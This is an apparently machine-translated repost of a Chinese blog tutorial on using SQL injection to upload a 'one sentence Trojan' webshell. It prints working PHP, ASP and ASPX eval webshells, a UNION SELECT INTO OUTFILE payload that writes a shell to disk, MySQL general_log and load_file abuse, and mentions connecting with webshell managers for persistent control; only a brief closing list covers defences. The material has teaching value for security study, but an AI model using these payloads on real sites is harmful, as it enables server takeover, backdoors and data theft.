from SQL Inject and upload one sentence Trojan horse _Buffedon The blog of -CSDN Blog _sqlmap Upload the Trojan

I think it's well written , Just forward it , Let more people learn .

utilize sql Inject and upload one sentence Trojan horse

• Reading guide
• 1. sql Hazards of Injection
• 2. File is written to
• • 2.1 webshell、 In a word, Trojans 、 back door
  • • webshell（ Malaysia ）
    • In a word, Trojans
    • Trojan file harm
  • 2.2 Prerequisites for file writing
  • 2.3 Write function
  • 2.4 How to find the root directory of the website ( Absolute path )
  • 2.5 Can only be combined with echo injection
  • 2.6 Log write file
  • 2.7 File read
  • • Prerequisite
    • Read function
  • 2.8 Protection against file writing

Reading guide

This article mainly introduces the utilization sql Some knowledge of vulnerability upload file . Using sql When injecting vulnerabilities and uploading files, we need to know

1. Uploaded web pages stay web Path to the server
2. What permissions should I obtain for uploading files , That is, what are the prerequisites
3. What should we write in the uploaded file , That is, how to write a Trojan horse program
4. What harm will be caused to the server after uploading , How to protect

1. sql Hazards of Injection

1. get data — Read database , Read system files
2. File operations
3. Execute system commands
4. Change the registration form

2. File is written to

Master how to write with write function shell

Master the use of log files to write shell

Mainly file writing And download

2.1 webshell、 In a word, Trojans 、 back door

Personal understanding
webshell That is to say asp、php、jsp perhaps cgi A code execution environment in the form of web page files , Mainly used for website management 、 Server management 、 Permission management and other operations . Easy to use , Just upload a code file , Visit through website , Many daily operations can be carried out , It greatly facilitates users' management of websites and servers . Because of this , There are also a small number of people who use the modified code as a backdoor , In order to control the website server .

For webmasters ,webshell It's a tool , Can be used to manage servers , System permissions .

1. For the attacker , The process of uploading Trojan files is getshell The process of ,
2. The attacker uploaded payload And after successful execution , You can see the background directory of the website , Be able to control the website server , Control of authority , This process is to get webshell.
3. Upload payload after , The next time you upload payload , To borrow Cknife, Tools such as ant sword connect directly to the website , Control the background , To cause a sustained attack , This process is the process of leaving the back door .

webshell（ Malaysia ）

webshell That is to say asp、aspx、php、jsp perhaps cgi A command execution environment in the form of web files , It can also be called a web backdoor .

After hacking into a website , Usually will asp、aspx、php or jsp Backdoor files and websites web The normal web page files in the server directory are mixed together , Then you can use the browser to access the backdoor file , To get a command execution environment , In order to control the website server .

seeing the name of a thing one thinks of its function ,“web” The implication is that the server is obviously required to be open web service ,“shell” The meaning of is to obtain the operation permission to the server to some extent .webshell Often referred to as the intruder through the website port on the website server to some extent operation authority . because webshell Most of them are in the form of dynamic scripts , It's also known as a backdoor tool for websites .

One side ,webshell It is often used by webmasters for website management 、 Server management and so on , according to FSO Different authorities , The function is to edit web script online 、 Upload and download files 、 view the database 、 Execute arbitrary program commands, etc .

In a word, Trojans

In a word, the Trojan horse is to insert the Trojan horse into the server and finally obtain by submitting a short code to the server webshell Methods

In a word, the Trojan horse can also communicate with sql Injection vulnerability is used in combination with , Inject with echo , Write a sentence to the root directory of the web page .

php In a word, Trojans ：  <?php @eval($_POST[value]); ?>    // @  Indicates that the execution will continue even if an error is reported 
asp In a word, Trojans ：  <%eval request ("value")%>  or   <% execute(request("value")) %>   
aspx In a word, Trojans ： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
 //eval  and  execute  Means to get and execute the following contents 	 

<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
 Create... Under the current directory xie.php file , And write a sentence into xd.php in 

Conditions for successful execution of one sentence Trojan horse

1. Trojan successfully uploaded , Not intercepted
2. An attacker can get the entire directory of a web page , That is to know the path of the Trojan horse
3. Uploading Trojan files can be web Server execution

Trojan file harm

1. Sensitive data of the infected host can be obtained
2. Occupancy system CPU Resources, etc , Even lead to system failure
3. Change the password of the infected host , Delete file , Modify registry

2.2 Prerequisites for file writing

1. There is an absolute path to the website – How to find
   2.mysql The service has Write permissions
   1. Folder permissions ; File permissions ; User permissions
2. secure_ file _ priv=’’ Indicates that writing or exporting... Is not allowed
   1. start-up phpstudy, stay my.ini Add this sentence to
3. mysql Connected users have file jurisdiction
4. Not right sql Sentence to escape

2.3 Write function

outfile;dumpfile

select * from user into outfile "d:\\1.php"
select * from user into dumpfile "d:\\1.php"
show variables like '%secure%'    // see  secure-file-priv  The current value 

2.4 How to find the root directory of the website ( Absolute path )

It must be uploaded to the root directory of the website , Otherwise it can't be executed

1. According to the leaked information

   Enter a domain name for example ：127.0.0.1/123.php

2. Manual error information

   Such information may appear in the response package

3. Based on experience , Yes Apache,linux,iis Understanding

2.5 Can only be combined with echo injection

id=-1' union select 1,"<?php eval($_POST['aaa']);?>",3 
into OUTFILE 'd:\\1.php' --+
-- sql-libs less-1  For example 

Then open the D disc , Find out 1.php Successfully wrote

After testing , And error reporting , Blind injection combination , You don't get the results you want

Therefore, error reporting injection and blind injection cannot be used to upload files to the server

2.6 Log write file

Logs are also files , So you can write a sentence to the log

1. First, check the log permissions , Open file permissions

    show variables like '%general%'	 // View log permissions 
    set GLOBAL general_log=1                // Open file permissions 
    set GLOBAL general_log_file='d:\\ route '	 // Change the log address 
   

2. LAPTOP-NDINB3J0.log Each query statement will be recorded , So first change the log file , Then write the Trojan horse to this file

Key points ： Know the path of the root directory and The command is to be executed

2.7 File read

Prerequisite

1. There is an absolute path to read the file
2. mysql The service has read permission to the path
3. mysql Connected users have file jurisdiction
4. secure_file_priv=’’

Read function

1. Read data function load_file(<‘ Absolute path ’>)

    select load_file('d:\\1.php')
   

2.8 Protection against file writing

1. Minimize permissions

   for example ： secure-file-priv
   linux in Setting the read / write execution permission of

2. Minimize functionality — Close the ports you don't need

   for example ftp,telnet Wait for the port

3. Service minimization

4. Add filtering

5. precompile